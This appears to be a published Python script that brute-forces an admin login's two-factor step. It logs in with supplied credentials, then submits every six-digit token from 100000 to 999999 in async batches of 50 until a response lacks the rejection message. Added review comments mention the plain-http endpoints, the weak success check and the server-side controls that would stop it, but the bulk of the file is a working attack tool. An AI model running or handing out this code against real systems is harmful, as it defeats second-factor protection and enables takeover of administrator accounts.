Created
December 1, 2021 20:32
Brute force an admin login and 2FA endpoint with token ranges 100,000 - 1,000,000
import asyncio
from itertools import islice, chain

import aiohttp
# Placeholder endpoints as published. The two login URLs use different
# placeholder hosts, and all three are plain http://, so anything sent to
# them (credentials, tokens, session cookies) would travel unencrypted.
LOGIN_FORM = "http://asd.sdfsdf/admin"
LOGIN_URL = "http://asd.fsdfsdf/admin"
TWOFA_FORM = "http://asda.asdas/doAdminTwoFactor.action"

# Substring searched for in a 2FA response body; a response containing it is
# treated as a rejected token.
INVALID_MESSAGE = "Invalid token, please try again"
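def batch(iterable, size):
    """Yield successive iterators over at most *size* items of *iterable*.

    Every yielded batch is a lazy view over one shared source iterator, so a
    batch has to be consumed before the next one is requested.

    Args:
        iterable: Any iterable to split up.
        size: Maximum number of items per batch.

    Yields:
        An iterator over the next (up to) *size* items.
    """
    source = iter(iterable)
    while True:
        chunk = islice(source, size)
        # Pull the first item eagerly to detect exhaustion. Under PEP 479
        # (Python 3.7+) a StopIteration escaping a generator body is turned
        # into RuntimeError, so it is caught here and converted to a return.
        try:
            head = next(chunk)
        except StopIteration:
            return
        yield chain([head], chunk)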
async def fetch(client, tok):
    """Submit one candidate token to TWOFA_FORM and classify the response.

    Args:
        client: The session object whose ``post`` method sends the request.
        tok: The candidate token, sent as the ``token`` form field.

    Prints "." when the body contains INVALID_MESSAGE; otherwise prints the
    token and calls ``exit()``.
    """
    form_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    payload = f'token={tok}'.encode()
    async with client.post(TWOFA_FORM, data=payload, headers=form_headers) as resp:
        # Any status other than 200 raises AssertionError here, which ends
        # the run; the script has no retry or back-off path.
        assert resp.status == 200
        body = await resp.text()
        if INVALID_MESSAGE in body:
            print(".", end="")
            return
        # NOTE(review): "accepted" is inferred only from the rejection text
        # being absent, so any other 200 page (an error page, a redirect
        # back to the login form) is reported as a valid token too.
        print("Token is {}".format(tok))
        exit()
async def main():
    """Log in with known credentials, then submit every token in the range.

    Opens one aiohttp session, fetches LOGIN_FORM, posts the credentials to
    LOGIN_URL, and then sends each value in 100000..999999 to ``fetch`` in
    groups of 50 concurrent requests.

    NOTE(review): presumably the single session is what carries the login
    cookie into the 2FA requests -- confirm against the target application.
    The loop can only run to completion against a verifier that puts no cap
    on failed attempts per pending login. On the server side it shows up as
    a long run of rejected 2FA POSTs from one session, arriving in bursts of
    50; capping failures per login attempt and alerting on that pattern are
    the corresponding controls.
    """
    form_headers = {"Content-Type": "application/x-www-form-urlencoded"}
    async with aiohttp.ClientSession() as client:
        landing = await client.get(LOGIN_FORM)
        assert landing.status == 200
        # First login step (optional); replace the body with known creds.
        await client.post(LOGIN_URL, headers=form_headers, data=b'username=user&password=password')
        for group in batch(range(100_000, 1_000_000), 50):
            pending = [asyncio.ensure_future(fetch(client, tok)) for tok in group]
            # Wait for the whole group before starting the next one, so at
            # most 50 requests are in flight at a time.
            await asyncio.gather(*pending)
# Script entry point: runs main() to completion on the event loop as soon as
# the module is executed (there is no __main__ guard, so importing this file
# starts the run as well).
loop = asyncio.get_event_loop()
loop.run_until_complete(main())